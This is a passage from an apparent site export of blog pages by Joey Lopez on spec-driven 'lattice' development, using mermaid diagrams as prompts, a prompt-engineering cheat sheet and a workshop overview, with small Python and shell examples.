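    rows = list(csv.reader(io.StringIO(csv_text)))
    header, data = rows[0], rows[1:]
    return json.dumps([
        {h: (cell if cell != "" else None) for h, cell in zip(header, row)}
        for row in data
    ])

csv_text = "name,age\nalice,30\nbob,\n"
result = json.loads(csv_to_json(csv_text))

# Contract checks drawn from KNOWLEDGE/SPEC:
csv_rows = len(list(csv.reader(io.StringIO(csv_text))))  # 3, including header
assert len(result) == csv_rows - 1        # invariant: row counts match
assert set(result[0]) == {"name", "age"}  # invariant: keys == headers
assert result[1]["age"] is None           # empty cell -> null, not ""
print("Contract invariants hold.")
```

Dropping these assertions into the integration test (Task 5) is what turns the prose invariant into a blocking gate.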
**Partial order and lattice theory. **Dependency is a relation: A ≤ B means "A must complete before B." This induces a DAG. Topological sort finds a linear extension -- a valid execution sequence. The "lattice" name is precise: the spec layers form a bounded lattice where KNOWLEDGE is the top element (most constrained) and OUTPUT is the bottom (most concrete). Convergence funnel: each layer narrows the solution space
KNOWLEDGE ┌──────────────────────────────────────────┐
(all facts) │ All possible systems that could exist │
└─────────────────┬────────────────────────┘
│ Eliminates: wrong domains, false assumptions
▼
SPEC ┌────────────────────────────────┐
(contract) │ Systems satisfying constraints │
└────────────────┬───────────────┘
│ Eliminates: wrong interfaces, missing criteria
▼
PLAN ┌──────────────────────┐
(schedule) │ Buildable systems │
└──────────┬───────────┘
│ Eliminates: impossible schedules, circular deps
▼
OUTPUT ┌────────────┐
(artifact) │ This system │
└────────────┘ **Entropy reduction. **Each layer removes entropy (uncertainty) from the solution space. KNOWLEDGE starts with high entropy -- many systems could satisfy the domain facts. SPEC cuts it down. PLAN cuts further. OUTPUT is a single point in the space. This is why the order matters: you can't reduce entropy at the PLAN layer if SPEC hasn't reduced it first. Each gate verifies that entropy actually decreased -- that the layer is strictly more constrained than the one above it. Core Insight The spec isn't documentation. It's a constraint system that converges toward a unique solution. Each layer removes entropy from the solution space. Design by contract makes the constraints checkable. Topological sort makes the execution order automatic. The result is a proof, not a hope. Analogy Sculpting. KNOWLEDGE is the block of marble -- it defines what material you're working with. SPEC is the rough shape -- you've removed the obvious excess. PLAN is the detailed form -- every chisel stroke is planned. OUTPUT is the statue. You can't plan chisel strokes before you know the rough shape. You can't rough-shape before you know the marble. The lattice enforces this order, and the gates check that each cut actually removed material (reduced entropy) rather than adding it back. Section 07
## Getting Started You don't need to rewrite your entire workflow. Start with the next feature. Here's the exact sequence:
```
# Step 1: Create the folder
mkdir -p spec/

# Step 2: Write KNOWLEDGE.md (human only, 1 hour max)
cat > spec/KNOWLEDGE.md <<'EOF'
# Domain Knowledge: [YOUR FEATURE]
## Constraints
- [What must be true? What are the hard limits?]
- [What formats, sizes, protocols are involved?]
## Prior Art
- [What exists already? What did you try before?]
- [What libraries/tools are relevant?]
## Invariants
- [What must ALWAYS be true, before and after execution?]
- [These become your integration tests.]
EOF

# Step 3: Draft SPEC.md (LLM drafts, human verifies against KNOWLEDGE)
# Prompt: "Given this KNOWLEDGE.md, write a SPEC with acceptance criteria"
# Then run Gate 2: every KNOWLEDGE constraint maps to a SPEC criterion

# Step 4: Draft PLAN.md (LLM drafts, human verifies against SPEC)
# Prompt: "Given this SPEC.md, decompose into tasks with prerequisites"
# Then run Gate 3: DAG is acyclic, every SPEC criterion has a task

# Step 5: Execute PLAN (LLM generates, human reviews at each gate)
# For each task in topo-sort order:
#   1. LLM generates output
#   2. Human runs Gate 4: does output match PLAN task?
#   3. If gate passes, move to next task
#   4. If gate fails, LLM regenerates (not the human fixing it)
```
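Gate 2 ("every KNOWLEDGE constraint maps to a SPEC criterion") can be approximated mechanically. A minimal sketch in Python, assuming a convention the article doesn't prescribe: constraints carry IDs like `K1`, and a criterion declares `covers K1` when it satisfies one.

```python
import re

knowledge_md = """\
## Constraints
- K1: Input files never exceed 100 MB
- K2: Output must be valid UTF-8
"""

spec_md = """\
## Acceptance Criteria
- S1 (covers K1): Reject uploads over 100 MB with a clear error
- S2 (covers K2): All emitted text passes a UTF-8 round-trip check
"""

# Gate 2: every constraint ID must appear in some "covers" clause.
constraints = set(re.findall(r"^- (K\d+):", knowledge_md, re.M))
covered = set(re.findall(r"covers (K\d+)", spec_md))

uncovered = constraints - covered
print("Gate 2 passes" if not uncovered else f"Gate 2 FAILS: {sorted(uncovered)}")
```

The point isn't the regex; it's that a gate is a check you can run, not a vibe.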
Try It Pick your next feature. Before touching code, write the three files: KNOWLEDGE, SPEC, PLAN. Spend three hours. Then compare the result to how you usually build features. Two things will surprise you: (1) the spec will catch requirements gaps you'd normally find during testing, and (2) the LLM's code quality improves dramatically when it has a verified spec to work from instead of a vague prompt.

Warning The most common failure mode: skipping KNOWLEDGE and jumping straight to SPEC. "I know the domain, I don't need to write it down." You do. KNOWLEDGE.md isn't for you today -- it's for the LLM that drafts SPEC, for the gate that verifies SPEC, and for you in three months when you've forgotten why you made that constraint. Write it down. One hour.

That's it. No fancy tooling. No formal verification software. Just structure, gates, and honesty about what you know and what you don't. The result: fewer bugs, faster development, and -- most importantly -- sleep. You know what your system will do before it does it. The lattice holds the proof. Joey Lopez · 2026 · [jrlopez.dev ]()
[← jrlopez.dev ]()· [← diagrams as prompts ]()· [guardrails → ]()[.md ]()
---
# mermaid-prompts.md
# https://jrlopez.dev/p/mermaid-prompts.html
---
title: "Diagrams as Prompts"
description: "Mermaid diagrams as structured reasoning inputs."
author: "Joey Lopez"
date: "2026-02-10"
tags: ["methodology", "theory"]
atom_id: 14
source_html: "mermaid-prompts.html"
url: "https://jrlopez.dev/p/mermaid-prompts.html"
generated: true
---
[jrlopez.dev ]()[Why Diagrams ]()[Specs ]()[Architecture ]()[Dependencies ]()[Flow ]()[The Pattern ]()[Examples ]()
# Diagrams as Prompts Mermaid diagrams aren't documentation. They're a reasoning tool. Feed yourself a diagram before you delegate work to AI. Joey Lopez [Why Diagrams ]()[Patterns ]()[Real Examples ]()Section 01
## The Problem With Prose Handoffs Prose feels clear when you write it. You're inside your own mental model. But when you hand it to an AI—or a teammate—the ambiguity suddenly surfaces. Dependencies weren't explicit. The sequence was wrong. Edge cases were invisible. Here's a prose spec for a simple page build: "Build a page with a nav, hero section, and three cards.
The nav should be sticky and have links to each card.
The cards should appear below the hero.
Make sure everything is responsive." Sounds reasonable, right? But look at what you didn't specify:
- Does the nav need to be built before the cards?
- Can the cards be built in parallel, or do they depend on shared tokens?
- What if the hero depends on the nav's padding?
- Is responsive a constraint or a suggestion? Now look at the same task as a diagram:
```
graph TD
T[L0: Tokens] --> N[L1: Nav]
T --> H[L1: Hero]
T --> C[L1: Cards]
N --> S[L2: Structure]
H --> S
C --> S
S --> V[L3: Verify Responsive]
```
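One reason the diagram removes ambiguity: it's machine-readable. A sketch (Python standard library; the regex handles only the simple `A[Label] --> B` arrow syntax used here, not full mermaid) that extracts the edges and derives a valid build order:

```python
import re
from graphlib import TopologicalSorter

mermaid = """
graph TD
    T[L0: Tokens] --> N[L1: Nav]
    T --> H[L1: Hero]
    T --> C[L1: Cards]
    N --> S[L2: Structure]
    H --> S
    C --> S
    S --> V[L3: Verify Responsive]
"""

# Each "A --> B" edge means A must be built before B.
edges = re.findall(r"(\w+)(?:\[[^\]]*\])?\s*-->\s*(\w+)", mermaid)

graph = {}  # node -> set of predecessors
for src, dst in edges:
    graph.setdefault(src, set())
    graph.setdefault(dst, set()).add(src)

# static_order() yields one valid linear extension of the dependency order.
build_order = list(TopologicalSorter(graph).static_order())
print(build_order)
```

Tokens always come out first, Verify last, and no component ever precedes its dependency.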
The diagram forces you to answer every question *before* you delegate. You see the dependencies. You see the layers. You see the build order. And when you give it to the AI, there's no ambiguity. Core Insight Prose hides structural ambiguity. A diagram forces you to resolve dependencies, sequence, and scope BEFORE the AI starts working. The diagram becomes the specification. Section 02
## Diagrams as Specs A mermaid flowchart replaces a multi-paragraph spec. It's terse, visual, and executable. The AI can read it. You can verify it. And it's version-controllable. Example: A spec-driven workflow for feature development. Mermaid Source
```
graph LR
K["📋 KNOWLEDGE.md"] --> S["📄 SPEC.md"]
S --> P["📋 PLAN.md"]
P --> O["⚙️ OUTPUT"]
O --> E["✅ EXECUTION"]
E -->|Iterate| S
```
This diagram tells you:
- Start with what you know (KNOWLEDGE.md)
- Turn that into a spec (SPEC.md)
- Turn the spec into a plan (PLAN.md)
- Execute the plan and verify output
- If output doesn't match spec, iterate on the spec, not the code Try It Take your next task. Before writing any prose, draw the flowchart first. Give ONLY the flowchart to the AI. No long instructions. Just the diagram. Section 03
## Architecture Handoffs When you need to coordinate multiple services or systems, a sequence diagram or architecture diagram replaces pages of documentation. Example: A three-service architecture with explicit message flow. Mermaid Source
```
sequenceDiagram
Client->>API: POST /task
API->>Queue: Enqueue task
Queue->>Worker: Process task
Worker->>Database: Save result
Database->>Queue: Ack
Queue->>API: Task complete
API->>Client: Return result
```
Now the AI—and any engineer reading this—knows:
- The exact message passing order
- Which services talk to which
- Where synchronous vs. async boundaries are
- What happens when a service fails Core Insight The diagram constrains the solution space. An AI given a sequence diagram can't invent new services or change the protocol. The diagram is the contract. Section 04
## Dependency Maps If you can't draw the dependency graph, you don't understand the build order. And if you don't understand the build order, you're gambling that the AI does. Example: A real build dependency graph. Mermaid Source
```
graph TD
CSS["CSS Tokens"] --> Nav["Nav Component"]
CSS --> Hero["Hero Component"]
CSS --> Card["Card Component"]
Nav --> Page["Page Layout"]
Hero --> Page
Card --> Page
Page --> Test["Integration Tests"]
JS["JavaScript"] --> Test
Test --> Build["Production Build"]
```
This diagram answers:
- What can be built in parallel? (Nav, Hero, Card all depend only on CSS)
- What's the critical path? (CSS → Page → Test → Build)
- What breaks if I skip a step? (You'll see it immediately) Warning If you can't draw the dependency graph, you don't understand the build order. And if you don't understand the build order, you're hoping the AI does. That's not a strategy. Section 05
## Flow Analysis Mermaid flows work for user journeys, data flows, and state machines. They make invisible paths visible. Example: A visitor flow through a teaching site. Mermaid Source
```
graph TD
L["Landing Page"]
L --> B["Browse Items"]
B --> T1["Teaching Page"]
B --> P["Paper PDF"]
T1 --> T2["Other Teaching Pages"]
T1 --> L
P --> L
T2 --> L
```
And a state machine for a task processor: Mermaid Source
```
stateDiagram-v2
[*] --> Idle
Idle --> Running: task_enqueued
Running --> Complete: success
Running --> Failed: error
Complete --> [*]
Failed --> Idle: retry
Failed --> [*]: max_retries
```
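A state diagram like this translates directly into a transition table, which makes "the diagram is the test suite" literal: anything the diagram doesn't allow is rejected. A minimal Python sketch (the terminal `[*]` states are modeled as an explicit `Done` state -- a naming choice for this sketch, since the diagram just shows `[*]`):

```python
# (state, event) -> next state, transcribed from the state diagram above.
TRANSITIONS = {
    ("Idle", "task_enqueued"): "Running",
    ("Running", "success"): "Complete",
    ("Running", "error"): "Failed",
    ("Failed", "retry"): "Idle",
    ("Failed", "max_retries"): "Done",
}

def step(state: str, event: str) -> str:
    """Apply one event; reject any transition the diagram doesn't allow."""
    key = (state, event)
    if key not in TRANSITIONS:
        raise ValueError(f"illegal transition: {state} --{event}-->")
    return TRANSITIONS[key]

# A legal run: enqueue, fail, retry, enqueue again, succeed.
state = "Idle"
for event in ["task_enqueued", "error", "retry", "task_enqueued", "success"]:
    state = step(state, event)
print(state)  # Complete
```

Any event sequence the diagram doesn't draw raises immediately -- the missing transitions are exactly the edge cases the prose never mentioned.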
Flows expose edge cases you didn't think about. Where can the system get stuck? What transitions are missing? The diagram is the test suite. Section 06
## The Universal Pattern Every time you delegate work to an AI, follow this pattern:
- **Think. **Don't write prose. Draw a diagram.
- **Audit. **Does the diagram match your intent? Are there missing edges? Circular dependencies?
- **Delegate. **Give ONLY the diagram to the AI. No long instructions.
- **Verify. **Does the output match the diagram? If not, the AI either misread it or the diagram was wrong. This is the contract. The diagram is the spec. Prose is optional. Code is the execution. Core Insight The diagram is the contract between you and the AI. Prose is a suggestion. A diagram is a specification. It has no ambiguity. This pattern works for:
- Feature specs
- Build pipelines
- API contracts
- Data transformations
- System architecture
- User journeys Section 07
## Real Examples Here are three real diagrams I use in practice. Each one replaced pages of documentation.
### Example 1: Site Build Lattice This is a teaching site build. It shows layers of dependencies and which components can be built in parallel. Mermaid Source
```
graph TD
T["L0: Tokens"] --> N["L1: Nav"]
T --> H["L1: Hero"]
T --> C["L1: Cards"]
N --> S["L2: Structure"]
H --> S
C --> S
S --> V["L3: Verify"]
```
**Used for: **Handed this to an AI agent to build the site. The layers made the build order crystal clear. No ambiguity about what blocks what.
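That build order can be recovered mechanically. A sketch using Python's standard-library `graphlib` to replay the lattice above and group nodes into layers that can run in parallel:

```python
from graphlib import TopologicalSorter

# node -> prerequisites, transcribed from the lattice above
deps = {
    "T": set(),
    "N": {"T"}, "H": {"T"}, "C": {"T"},
    "S": {"N", "H", "C"},
    "V": {"S"},
}

ts = TopologicalSorter(deps)
ts.prepare()
layers = []
while ts.is_active():
    ready = sorted(ts.get_ready())  # every node whose prerequisites are done
    layers.append(ready)
    ts.done(*ready)

print(layers)  # [['T'], ['C', 'H', 'N'], ['S'], ['V']]
```

Each inner list is a layer: Nav, Hero, and Cards can be delegated to parallel agents the moment Tokens lands.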
### Example 2: Spec-Driven Workflow This is the workflow I follow for every feature: Knowledge → Spec → Plan → Output → Execution. Mermaid Source
```
graph LR
K["KNOWLEDGE.md"] --> S["SPEC.md"]
S --> P["PLAN.md"]
P --> O["OUTPUT"]
O --> E["EXECUTION"]
```
**Used for: **Pinned above my terminal. When I'm tempted to jump to code without writing a spec, I see it and stop. The diagram is the guardrail.
### Example 3: Visitor Flow This is a teaching site's user journey. It shows how visitors move through the content and where they can return to the landing page. Mermaid Source
```
graph TD
L["Landing"]
L --> B["Browse items"]
B --> T1["Teaching page"]
B --> P["Paper PDF"]
T1 --> T2["Other teaching"]
T1 --> L
P --> L
T2 --> L
```
**Used for: **Shared with a designer. They could see exactly how users move through the site without reading a single paragraph of documentation. Joey Lopez · 2026 · [jrlopez.dev ]()
[← jrlopez.dev ]()· [← cheat sheet ]()· [lattice development → ]()[.md ]()
---
# prompt-cheatsheet.md
# https://jrlopez.dev/p/prompt-cheatsheet.html
---
title: "Prompts Are Programs"
description: "Composition cheat sheet. Load/Chain/Compose operators."
author: "Joey Lopez"
date: "2025-11-20"
tags: ["methodology", "prompting", "template", "reference"]
atom_id: 13
source_html: "prompt-cheatsheet.html"
url: "https://jrlopez.dev/p/prompt-cheatsheet.html"
generated: true
---
[jrlopez.dev ]()[Formula ]()[Attention ]()[Density ]()[Operations ]()[Structure ]()[Patterns ]()[Persistence ]()[Reference ]()[Mistakes ]()
# Prompts Are Programs A composition cheat sheet. Attention positioning, token density, core operations, and every pattern with citations. Joey Lopez [Attention ]()[Operations ]()[Patterns ]()Section 01
## The Formula Every prompt you've ever written follows this structure. Template defines *how* to think. Context defines *what* to think about. Output is the novel result.

Template (static) + Context (dynamic) = Output (novel)
        ↓                   ↓                  ↓
  How to think      What to think about    Result for THIS context

This isn't metaphorical. It's literal. The template is reusable—you can apply it to any context. The context is unique to this instance. The output is only possible because both exist together. Core Insight Every prompt you've ever written is an instance of this formula. Template + Context = Output. Reuse templates across contexts. Never mix them. Section 02
## Where Attention Falls Language models don't distribute attention equally. Transformer architectures have positional bias: top and bottom get more focus. Middle content—even if critical—gets statistically less attention.

┌─────────────────────────────────┐
│ TOP: Critical instructions      │  ← HIGH attention (primacy)
│ - Role, constraints, "never X"  │
├─────────────────────────────────┤
│ MIDDLE: Reference material      │  ← LOWER attention
│ - Code, data, examples          │
├─────────────────────────────────┤
│ BOTTOM: Task + output format    │  ← HIGH attention (recency)
│ - Specific ask, reminders       │
└─────────────────────────────────┘

**Sandwich technique: **Put critical constraints at TOP and BOTTOM. Never bury your most important instruction in the middle, no matter how well you explain it.

Warning If your critical instruction is in the middle, the model is statistically less likely to follow it. This isn't a design choice—it's an artifact of positional attention bias in transformers. **Citation: **Liu et al. (2023) *Lost in the Middle: How Language Models Use Long Contexts *arXiv:2307.03172 Section 03
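The sandwich technique is simple enough to automate. A hedged sketch in Python (the prompt text and section labels are invented for illustration) that assembles a prompt with the critical constraints repeated at top and bottom:

```python
def sandwich(constraints: list[str], reference: str, task: str) -> str:
    """Place critical constraints at the top AND bottom (primacy + recency);
    bulky reference material goes in the low-attention middle."""
    block = "\n".join(f"- {c}" for c in constraints)
    return (
        f"CONSTRAINTS:\n{block}\n\n"
        f"REFERENCE:\n{reference}\n\n"
        f"TASK:\n{task}\n\n"
        f"REMINDER (critical):\n{block}\n"
    )

prompt = sandwich(
    constraints=["Never log secrets", "Output valid JSON only"],
    reference="def handler(event): ...",  # imagine pages of code here
    task="Review the handler for security issues.",
)
print(prompt)
```

The constraints appear twice by construction, so the bulky middle can grow without pushing them out of the high-attention positions.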
## Token Density Whitespace, prose, and formatting all cost tokens. The same idea expressed densely uses 3-5x fewer tokens. Denser tokens = more context available for the model to use.
| Format | Density | Best For |
| --- | --- | --- |
| Pseudocode | Highest | Technical specs |
| Collapsed JSON | Very High | Tabular data to LLM |
| XML | High | Structured instructions |
| YAML | Medium | Human-readable config |
| Prose | Low | Explanations |
| Formatted JSON | Lower | Pretty-printed output |
**Example: **Dense (15 tokens)
```
def get_user(id: int) -> User:
"""Cache 5min, raise NotFound"""
```
Sparse (45 tokens)
```
The get_user function accepts an integer ID parameter
and returns a User object. Results are cached for 5
minutes. Raises NotFound if the user doesn't exist.
```
Try It Take your last prompt. Rewrite the specification section as pseudocode instead of prose. Count how many tokens you save. Share the ratio with a colleague. Section 04
## Load, Chain, Compose There are only three things you can do with a prompt. Everything else is a combination of these three operations.
### 1. Load Bring artifacts into context—files, git status, command output, external data.
```
!`git status --short`
```
### 2. Chain Output of step A becomes input to step B. Preserve state across steps.
```
Step 1: Analyze requirements → requirements.md
Step 2: Load requirements.md → Generate plan → plan.md
Step 3: Load plan.md → Implement with full context
```
### 3. Compose Combine a template with context to produce a specialized output.
```
Template: "Review code for $CRITERIA"
Context: CRITERIA=security, FILE=auth.py
Output: Security review of auth.py
```
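In Python, Compose is literally template substitution. A minimal sketch of the operation above using the standard-library `string.Template`:

```python
from string import Template

# Template (static): HOW to think. Reusable across contexts.
review = Template("Review $file for $criteria. Report findings as a numbered list.")

# Context (dynamic): WHAT to think about, for THIS instance.
prompt = review.substitute(file="auth.py", criteria="security")
print(prompt)
# Review auth.py for security. Report findings as a numbered list.
```

Swap the context (`file="billing.py"`, `criteria="performance"`) and the same template produces a different specialized prompt -- that reuse is the whole point of the formula.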
Core Insight These are the only three things you can do with a prompt. Everything else—chaining, few-shot, meta-prompting—is a combination of Load, Chain, and Compose. Section 05
## XML Structure XML tags create clear boundaries between objective, context, requirements, constraints, output, and verification. The model respects structured boundaries more reliably than prose.
### 6-Tag Pattern
```
<objective>What and why</objective>
<context>Background, files to load</context>
<requirements>Specific instructions</requirements>
<constraints>What to avoid and WHY</constraints>
<output></output>
<verification>How to confirm success</verification>
```
### Tag Selection by Complexity
| Task Type | Include Tags |
| --- | --- |
| Simple | objective, output, verification |
| Complex | Add context, constraints |
| Pattern demo | Add examples, before/after |
| Security risk | Add security_checklist |
### Full Template
```
<objective>
Refactor the authentication module to use industry-standard bcrypt
instead of custom hashing, improving security and maintainability.
</objective>
<context>
custom_sha256 with salt rotation every 30 days
</context>
<requirements>
1. Replace custom hash with bcrypt
2. Maintain backward compatibility for existing hashes
3. All existing tests must pass
4. New tests for bcrypt edge cases
</requirements>
<constraints>
- No new external dependencies (bcrypt must already be in requirements)
- Cost factor must be ≥12
- Never log passwords, hashes, or salt
- Migration path for existing users
</constraints>
<verification>
All tests pass, including new bcrypt tests.
Manual check: old hashes still verify, new hashes use bcrypt.
No new secrets in logs.
</verification>
```
Section 06
## The Pattern Catalog These are the patterns that work. Not because they're trendy—because they're grounded in how transformers process language.
### Foundational Patterns
| Pattern | Template | When |
| --- | --- | --- |
| **Persona** | "You are an expert [role] with [skills]..." | Every prompt. Anchors behavior. |
| **Few-Shot** | 2-3 input → output examples | Complex output format or rare patterns. |
| **Template** | "Respond in this format: [structure]" | When output structure is critical. |
| **Chain-of-Thought** | "Think step by step before answering" | Multi-step reasoning, math, logic. |
### Advanced Patterns
#### ReAct (Reasoning + Action)
```
THINK: What should I do?
ACT: Do specific action
OBSERVE: Check result
→ Repeat until done
```
**Citation: **Yao et al. (2022) *ReAct: Synergizing Reasoning and Acting in Language Models *arXiv:2210.03629
#### Tree of Thoughts
```
1. Generate 3 approaches
2. Evaluate pros/cons each
3. Choose best, execute
```
**Citation: **Yao et al. (2023) *Tree of Thoughts: Deliberate Problem Solving with Large Language Models *arXiv:2305.10601
#### Meta-Prompting Use AI to generate prompts for other AI to execute. Separates analysis from execution—one model does clarification, another does the work with fresh context.
```
You (vague idea) → AI #1 (generates detailed prompt) → AI #2 (executes with full attention)
```
**Why it works: **AI #1 asks clarifying questions, adds structure, defines success criteria. AI #2 gets clean, specific instructions with full attention. No context wasted on negotiation. Pattern Insight Persona + Few-Shot should be in every prompt. Use Chain-of-Thought for reasoning. Use ReAct for iteration. Use Meta-Prompting when one model can't hold both the goal and the execution strategy.
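The two-stage flow can be sketched as a small function. Python; `call_model` is a stand-in for whatever LLM client you use, passed in as a parameter since this is a sketch, not a real API:

```python
def meta_prompt(vague_idea: str, call_model) -> str:
    """Two-stage meta-prompting: AI #1 drafts a detailed prompt,
    AI #2 executes it in a fresh call with full attention."""
    detailed = call_model(
        "Rewrite this request as a detailed prompt with explicit "
        f"success criteria and an output format:\n{vague_idea}"
    )
    return call_model(detailed)  # second call: clean instructions, no negotiation

# Dry run with a fake model to show the flow:
log = []
def fake_model(prompt: str) -> str:
    log.append(prompt)
    return f"<response to: {prompt[:30]}...>"

result = meta_prompt("make the login page better", fake_model)
print(len(log))  # 2 -- one drafting call, one execution call
```

The separation is the design choice: the executing call never sees the back-and-forth that produced its instructions.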
### Citations
- Wei et al. (2022) *Chain-of-Thought Prompting Elicits Reasoning in Large Language Models *arXiv:2201.11903
- White et al. (2023) *A Prompt Pattern Catalog to Enhance Prompt Engineering with ChatGPT *arXiv:2302.11382 Section 07
## Making Context Survive Context windows fill up. Conversations end. Projects span weeks. These three files are how you maintain coherence across boundaries.
### Spec Folder Pattern
```
spec/
├── KNOWLEDGE.md # WHY - Decisions, constraints, patterns
├── SPEC.md # WHAT - Requirements, acceptance criteria
└── PLAN.md # HOW - Phases, tasks, verification
```
### Surgical Loading Load based on what you're doing, not everything at once:
| Task | Load This | Why |
| --- | --- | --- |
| Understanding constraints | KNOWLEDGE.md only | Focus on why, not what or how |
| Checking requirements | SPEC.md only | Verify acceptance criteria |
| Executing next step | PLAN.md only | Get unblocked, don't re-design |
| Planning a phase | SPEC.md + KNOWLEDGE.md | Requirements + constraints |
Warning Never load all three at once. It wastes context on irrelevant information. You're optimizing for attention—load only what this step needs.
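The table above is a dispatch rule, and it fits in a few lines. A sketch in Python; the task-type keys are invented names for the table's rows:

```python
import tempfile
from pathlib import Path

# Task type -> the only files that step needs (see the table above).
LOAD_MAP = {
    "understand_constraints": ["KNOWLEDGE.md"],
    "check_requirements": ["SPEC.md"],
    "execute_next_step": ["PLAN.md"],
    "plan_phase": ["SPEC.md", "KNOWLEDGE.md"],
}

def surgical_load(task_type: str, spec_dir: Path) -> str:
    """Assemble context from only the files this step needs."""
    parts = [f"## {name}\n{(spec_dir / name).read_text()}"
             for name in LOAD_MAP[task_type]]
    return "\n\n".join(parts)

# Demo against a throwaway spec/ folder:
spec_dir = Path(tempfile.mkdtemp())
for name in ["KNOWLEDGE.md", "SPEC.md", "PLAN.md"]:
    (spec_dir / name).write_text(f"({name} contents)")

context = surgical_load("plan_phase", spec_dir)
print(context.count("##"))  # 2 -- SPEC.md and KNOWLEDGE.md, never all three
```

Making the load map explicit also documents, per step, what you decided the model does NOT need to see.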
### Context Handoff Template
```
What was requested at the start
Files created/modified, decisions made, blockers resolved
Specific next tasks with file paths
What failed and why - avoid repeating mistakes
Gotchas, assumptions, constraints discovered in the work
What's finalized vs still draft. Which files are safe to change.
```
Save this as HANDOFF.md or CONTEXT.md. Load it at the start of your next session. Forward Link This folder structure isn't arbitrary. It's a dependency lattice. Knowledge informs Spec. Spec informs Plan. Plan refers back to both. This is Lattice-Driven Development. Section 08
## Quick Reference Bookmark this section. Use these tables every time you write a prompt.
### Attention Positioning
| Position | Put Here | Why |
| --- | --- | --- |
| Top | Role, constraints, "never X" | Primacy bias |
| Middle | Code, data, examples | Reference material |
| Bottom | Task, output format, reminders | Recency bias |
### Core Operations
| Operation | What | Example |
| --- | --- | --- |
| Load | Bring into context | !`git status --short` |
| Chain | Output → Input | plan.md → implementation |
| Compose | Template + Context | "Review $FILE for $CRITERIA" |
### Token Optimization
| Do | Don't |
| --- | --- |
| Pseudocode | Verbose prose |
| Collapsed JSON | Formatted JSON |
| XML tags | Markdown headings |
| TOON for arrays | Nested JSON |
### Patterns to Use
| Pattern | When |
| --- | --- |
| Persona + Few-shot | Every prompt |
| Chain-of-Thought | Complex reasoning |
| ReAct | Multi-step with validation |
| Tree of Thoughts | Trade-off decisions |
| Meta-Prompting | AI generates prompts |
| Sandwich | Critical constraints |
### Persistence Files
| File | Contains |
| --- | --- |
| KNOWLEDGE.md | Why (decisions, constraints) |
| SPEC.md | What (requirements, criteria) |
| PLAN.md | How (tasks, phases) |
| CONTEXT.md | State (handoff, current progress) |
Section 09
## Common Mistakes These happen in almost every project. Learn to spot them early.
| Wrong | Right | Why |
| --- | --- | --- |
| Load entire repo into prompt | Load only what this step needs | Wastes context, dilutes attention on relevant code |
| "Make it better" | "Refactor X to use Y pattern" | Vague instructions breed vague outputs |
| Analyze + fix in one prompt | Analyze → report → fresh context → fix | Separating concerns lets the model focus on one thing |
| Bury critical instruction in middle | Put at top AND bottom (sandwich) | Positional attention bias; recency + primacy |
| Prose for specs | Pseudocode or XML | Dense is better; whitespace costs tokens |
| Load KNOWLEDGE + SPEC + PLAN together | Surgical load: pick one or two per step | Irrelevant files waste context window |
Try It Pick your last 3 prompts. Check each against this table. Did you make any of these mistakes? Rewrite one to fix it. Share the before/after with a colleague. Joey Lopez · 2026 · [jrlopez.dev ]()
[← jrlopez.dev ]()· [← guardrails ]()· [foundational patterns → ]()[.md ]()
---
# prompt-engineering-bootcamp.md
# https://jrlopez.dev/p/prompt-engineering-bootcamp.html
---
title: "Prompt Engineering Bootcamp"
description: "90-minute hands-on workshop — systematic AI workflows, role-specific tracks, capstone skill build."
author: "Joey Lopez"
date: "2026-01-10"
tags: ["prompting", "teaching"]
atom_id: 24
source_html: "prompt-engineering-bootcamp.html"
url: "https://jrlopez.dev/p/prompt-engineering-bootcamp.html"
generated: true
---
[← home ]()[overview ]()[materials ]()[session flow ]()[what's new ]()
# Prompt Engineering Bootcamp From Patterns to Systems Joey Lopez · Sr. Data Engineer [overview ]()[materials ]()[session flow ]()[what's new ]()
## Overview A redesigned 90-minute hands-on workshop that teaches systematic AI workflows through three intuitions: **context is everything **, **structure gets rewarded **, and **you are the retrieval system **. Participants leave with installed tools and the ability to create more. 90 Minutes Live + 15 min prerequisite 4 Role-Specific Tracks Dev, PO/PM, Delivery, Tech Lead 5 Skills Included 4 role skills + 1 capstone 2026 Current Actively maintained
## Materials & Resources
### For Participants 📋
#### Common Knowledge 15-minute self-study. Complete before the live session to align on foundational concepts. [Participant Materials → ]()🎤
#### Session 1 — Patterns & Priority Builder 60 min. Three Approaches Framework, foundational patterns, and a hands-on priority builder exercise. [Session 1 → ]()🎯
#### Session 2 — Advanced Patterns & Interview Prep 60 min. ReAct, Tree of Thoughts, and a complete interview preparation workflow using spec-kit methodology. [Session 2 → ]()⚡
#### Quick Reference Cards Pattern recognition guide and decision tree for rapid lookup during practice. [Quick Reference → ]()
### Role-Specific Skills 👨💻
#### Developer Second Brain ReAct-driven code migrations, refactoring, feature implementation, and systematic debugging with annotated diffs. [Developer Skill → ]()📊
#### PO/PM Second Brain User stories with Given/When/Then criteria, sprint backlogs with capacity planning, roadmap prioritization, and exec reports. [PO/PM Skill → ]()📋
#### Delivery Lead Second Brain ABCD priority building, risk matrices, client status reports, and phased onboarding plans — all system-ready. [Delivery Lead Skill → ]()🏗️
#### Tech Lead Second Brain ADRs via Tree of Thoughts, metaprompts for team amplification, technical spike plans, and .cursorrules generation. [Tech Lead Skill → ]()🔨
#### Make Skills (Capstone) Turn any repeated weekly task into a structured skill file. 3-phase workflow: discover, extract pattern, generate. Every skill is a RAG system. [Make Skills → ]()
### For Facilitators 📚
#### Facilitator Guide v2 Minute-by-minute script, timing notes, failure modes, and contingency plans for delivery. [Facilitator Guide → ]()📖
#### Participant Materials Decision matrices, demo personas, spec-kit templates, and workshop completion checklist. [Participant Materials → ]()
## Session Flow 105 total minutes: 15 min prereq + 90 min live 15 min Prereq Self-study 15 min Activation Framing & context 40 min Role Fork Role-specific deep dive 20 min Capstone Build your own skill 10 min Reveal + Close Synthesis & next steps
## What's New in v2 Refined based on v1 success. Better structure, faster delivery, more agency.
| Dimension | v1 | v2 |
| --- | --- | --- |
| **Duration** | 2 hours | 90 min + 15 min prereq (105 min total) |
| **Structure** | Single track | 4 role-specific tracks |
| **Focus** | Pattern recognition | System building + pattern mastery |
| **Exercises** | Generic examples | Role-aligned, production-relevant |
| **Takeaway** | Understand patterns | Installed tools + ability to build more |
| **Capstone** | None | Make Your Own Skills (20 min) |
| **Grounding** | Academic | Grounded in real project outcomes |
### Key Improvements
- ✓ **Faster **: 90 min instead of 120 (still covers more)
- ✓ **More relevant **: Role-specific patterns, not one-size-fits-all
- ✓ **Agency **: Participants build their own skills in the capstone
- ✓ **Production-tested **: Methodology grounded in real project outcomes
- ✓ **Lower activation energy **: Prereq removes baseline friction Joey Lopez · 2026 · [jrlopez.dev ]()· [← home ]()· [guardrails → ]()[.md ]()
---
# prompting-advanced.md
